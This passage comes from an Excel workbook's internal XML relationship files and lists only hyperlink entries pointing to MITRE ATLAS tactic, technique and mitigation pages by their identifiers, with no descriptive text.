Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0002" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0012" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0006" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0004" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0011" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0001"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atlas.mitre.org/mitigations/AML.M0020" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0012" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0019" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0005" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0013" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0015" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0024" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0016" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0014" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0008" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0018" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0009" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0006" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0007" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0017" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0004" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0011" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0002" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0003" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0025" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0000" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0001" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0010" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0022" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0021" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0023" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0046" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.001" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.002" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.004" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0003" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0001" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0004" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0072" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0066" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.001" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0070" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0058" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0019" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0060" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.001" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0020" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.000" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0041" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.003" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0052" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.001" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002.001" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.003" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0074" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.003" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011.001" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0067" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0047" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0077" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0061" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0068" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0065" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0053" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0054" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0057" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.000" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.001" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.004" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.000" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051.001" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0073" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.000" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.002" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0064" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0044" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.000" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0071" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.001" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0056" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.002" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0049" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0025" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0015" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0021" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0059" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0031" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0040" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.002" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0078" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.002" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0062" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0063" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0013" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0014" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0007" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051.000" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.004" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0017" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0029" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002.000" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0037" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0036" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.002" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0034" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0076" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.000" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.004" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.001" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0050" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0075" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0067.000" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.002" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.001" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0017.000" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.000" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0042" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0012" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.003" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.002" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.000" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0055" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011.000" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.001" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.000" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.002" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.002" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.001" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0079" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.000" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0052.000" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0006" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0035"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atlas.mitre.org/tactics/AML.TA0010" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0005" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0008" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0007" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0013" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0014" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0009" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0000" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0003" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0002" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0012" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0006" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0004" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0011" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0001"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atlas.mitre.org/mitigations/AML.M0020" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0012" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0019" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0005" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0013" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0015" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0024" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0016" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0014" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0008" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0018" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0009" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0006" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0007" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0017" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 